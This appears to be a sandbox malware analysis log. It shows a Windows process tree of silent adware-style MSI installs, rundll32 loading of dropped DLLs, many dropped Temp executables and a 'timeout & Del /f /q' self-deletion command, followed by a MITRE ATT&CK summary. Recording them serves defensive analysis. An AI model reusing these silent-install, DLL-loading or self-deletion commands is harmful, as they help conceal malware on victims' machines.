C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629059113 /qn CAMPAIGN=""710"" " CAMPAIGN="710"11⤵PID:6656
-
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe" /quiet SILENT=1 AF=715 BF=7156⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:2256 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629059113 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"7⤵PID:7160
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\md9_1sjm.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md9_1sjm.exe"2⤵
- Executes dropped EXE
PID:2004
-
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4564 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
PID:4860 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 4723⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3320
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4860 -ip 48601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:3188
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4880
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5112 -ip 51121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1592
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1592
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv UsXpThP4n06XySnoIexb1A.0.21⤵
- Modifies data under HKEY_USERS
PID:5432
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
PID:2056
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 6000 -ip 60001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3688
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5972 -ip 59721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4716
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5928 -ip 59281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5448
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 3168 -ip 31681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1300
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5948 -ip 59481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1748
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1196 -ip 11961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6052
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:6032
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4584 -ip 45841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4352
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1236 -ip 12361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1724
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 4612 -ip 46121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:432
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1684 -ip 16841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5408
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3624 -ip 36241⤵PID:1832
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4564 -ip 45641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3088
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 6756 -ip 67561⤵PID:7072
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6680 -ip 66801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6884
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 6192 -ip 61921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7556
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6820 -ip 68201⤵PID:7436
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 5336 -ip 53361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7668
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 4908 -ip 49081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8012
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 5548 -ip 55481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6700
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
PID:8076 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F3DBF9C638684149483D8280A2DC4CED C2⤵
- Loads dropped DLL
PID:6960
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 13FD663930AC7AF4A6C7A87DB91F3150 C2⤵
- Loads dropped DLL
PID:7632
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DBE6D998E04067B55EE6D03C46C1D44B2⤵
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
PID:7604
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 59D9C5376BEAAB86782D23100F64AEE4 C2⤵PID:1628
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3834D79033CE5D0B7B3219F2BB272DEA C2⤵PID:4772
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding ADB666B036258AF9D9B7C593A53C3B88 C2⤵PID:5968
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵PID:8296
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default3⤵PID:8252
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"4⤵PID:5992
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1cc,0x210,0x7fffdc85dec0,0x7fffdc85ded0,0x7fffdc85dee05⤵PID:8152
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1b8,0x1bc,0x1c0,0x134,0x1c4,0x7ff62a039e70,0x7ff62a039e80,0x7ff62a039e906⤵PID:6320
-
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1616,10236623361212260661,414086598285789208,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5992_1990753029" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1624 /prefetch:25⤵PID:3684
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,10236623361212260661,414086598285789208,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5992_1990753029" --mojo-platform-channel-handle=1972 /prefetch:85⤵PID:5860
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1616,10236623361212260661,414086598285789208,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5992_1990753029" --mojo-platform-channel-handle=2240 /prefetch:85⤵PID:6580
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1616,10236623361212260661,414086598285789208,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5992_1990753029" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=1968 /prefetch:15⤵PID:8336
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1616,10236623361212260661,414086598285789208,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5992_1990753029" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2004 /prefetch:15⤵PID:8040
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1616,10236623361212260661,414086598285789208,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5992_1990753029" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3236 /prefetch:25⤵PID:5316
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,10236623361212260661,414086598285789208,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5992_1990753029" --mojo-platform-channel-handle=3524 /prefetch:85⤵PID:6520
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,10236623361212260661,414086598285789208,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5992_1990753029" --mojo-platform-channel-handle=3652 /prefetch:85⤵PID:7444
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,10236623361212260661,414086598285789208,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5992_1990753029" --mojo-platform-channel-handle=1740 /prefetch:85⤵PID:3140
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,10236623361212260661,414086598285789208,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5992_1990753029" --mojo-platform-channel-handle=3232 /prefetch:85⤵PID:2020
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,10236623361212260661,414086598285789208,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5992_1990753029" --mojo-platform-channel-handle=2848 /prefetch:85⤵PID:8816
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_3F82.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"3⤵PID:7516
-
-
-
C:\Users\Admin\AppData\Local\Temp\EC26.exeC:\Users\Admin\AppData\Local\Temp\EC26.exe1⤵
- Suspicious use of SetWindowsHookEx
PID:5976
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 7152 -ip 71521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7344
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 6336 -ip 63361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8124
-
C:\Users\Admin\AppData\Local\Temp\32C5.exeC:\Users\Admin\AppData\Local\Temp\32C5.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5548
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6304 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:6256 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6256 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7188
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 6256 -ip 62561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4312
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 7348 -ip 73481⤵PID:3416
-
C:\Users\Admin\AppData\Local\Temp\48EE.exeC:\Users\Admin\AppData\Local\Temp\48EE.exe1⤵
- Suspicious use of SetThreadContext
PID:5940 -
C:\Users\Admin\AppData\Local\Temp\Frenetic.exe"C:\Users\Admin\AppData\Local\Temp\Frenetic.exe"2⤵PID:6792
-
C:\Users\Admin\AppData\Local\Temp\Frenetic.exeC:\Users\Admin\AppData\Local\Temp\Frenetic.exe3⤵PID:1708
-
-
-
C:\Users\Admin\AppData\Local\Temp\Goofs.exe"C:\Users\Admin\AppData\Local\Temp\Goofs.exe"2⤵PID:1332
-
C:\Users\Admin\AppData\Local\Temp\Goofs.exeC:\Users\Admin\AppData\Local\Temp\Goofs.exe3⤵PID:6988
-
-
-
C:\Users\Admin\AppData\Local\Temp\60EB.exeC:\Users\Admin\AppData\Local\Temp\60EB.exe1⤵PID:4108
-
C:\Users\Admin\AppData\Local\Temp\60EB.exeC:\Users\Admin\AppData\Local\Temp\60EB.exe2⤵PID:740
-
C:\Users\Admin\AppData\Local\Temp\JlDDH5tMEb.exe"C:\Users\Admin\AppData\Local\Temp\JlDDH5tMEb.exe"3⤵PID:1204
-
C:\Users\Admin\AppData\Local\Temp\JlDDH5tMEb.exeC:\Users\Admin\AppData\Local\Temp\JlDDH5tMEb.exe4⤵PID:5444
-
C:\Users\Admin\AppData\Local\Temp\123.exe"C:\Users\Admin\AppData\Local\Temp\123.exe"5⤵PID:8512
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8512 -s 3046⤵
- Program crash
PID:5748
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\60EB.exe"3⤵PID:6308
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
PID:9212
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵PID:5040
-
C:\Users\Admin\AppData\Local\Temp\8B87.exeC:\Users\Admin\AppData\Local\Temp\8B87.exe1⤵PID:3240
-
C:\Users\Admin\AppData\Local\Temp\A440.exeC:\Users\Admin\AppData\Local\Temp\A440.exe1⤵PID:5444
-
C:\Users\Admin\AppData\Local\Temp\C0D1.exeC:\Users\Admin\AppData\Local\Temp\C0D1.exe1⤵PID:6552
-
C:\Users\Admin\AppData\Local\Temp\DA17.exeC:\Users\Admin\AppData\Local\Temp\DA17.exe1⤵PID:7452
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 4860 -ip 48601⤵PID:3996
-
C:\Users\Admin\AppData\Local\Temp\E8AE.exeC:\Users\Admin\AppData\Local\Temp\E8AE.exe1⤵PID:7492
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵PID:5076
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7492 -s 3082⤵
- Program crash
PID:2020
-
-
C:\Users\Admin\AppData\Local\Temp\F060.exeC:\Users\Admin\AppData\Local\Temp\F060.exe1⤵PID:7260
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7260 -s 2802⤵
- Program crash
PID:500
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 7260 -ip 72601⤵PID:2708
-
C:\Users\Admin\AppData\Local\Temp\F989.exeC:\Users\Admin\AppData\Local\Temp\F989.exe1⤵PID:6228
-
C:\Users\Admin\AppData\Local\Temp\WindowsHelper.exe"C:\Users\Admin\AppData\Local\Temp\WindowsHelper.exe"2⤵PID:2512
-
C:\Users\Admin\AppData\Local\Temp\WindowsHelper.exe"C:\Users\Admin\AppData\Local\Temp\WindowsHelper.exe"3⤵PID:6448
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:7160
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\F989.exe"C:\Users\Admin\AppData\Local\Temp\F989.exe"2⤵PID:5236
-
-
C:\Users\Admin\AppData\Local\Temp\FE3D.exeC:\Users\Admin\AppData\Local\Temp\FE3D.exe1⤵PID:3416
-
C:\Users\Admin\AppData\Local\Temp\FE3D.exeC:\Users\Admin\AppData\Local\Temp\FE3D.exe2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1832
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:2712
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2712 -s 8682⤵
- Program crash
PID:7100
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 3188 -ip 31881⤵PID:5136
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2712 -ip 27121⤵PID:7504
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6568
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:6156
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6808
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 6868 -ip 68681⤵PID:6732
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5112
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 6736 -ip 67361⤵PID:7924
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:2024
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7488
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 456 -ip 4561⤵PID:6104
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1104 -ip 11041⤵PID:6296
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 436 -ip 4361⤵PID:5920
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 6044 -ip 60441⤵PID:7908
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 6688 -ip 66881⤵PID:5540
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 784 -p 7680 -ip 76801⤵PID:7516
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5904 -ip 59041⤵PID:1204
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 5660 -ip 56601⤵PID:8256
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6892 -ip 68921⤵PID:8604
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 804 -p 7748 -ip 77481⤵PID:8828
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 3332 -ip 33321⤵PID:1040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 792 -p 6420 -ip 64201⤵PID:8564
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 7492 -ip 74921⤵PID:4412
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 824 -p 8512 -ip 85121⤵PID:2068
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
1Install Root Certificate
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1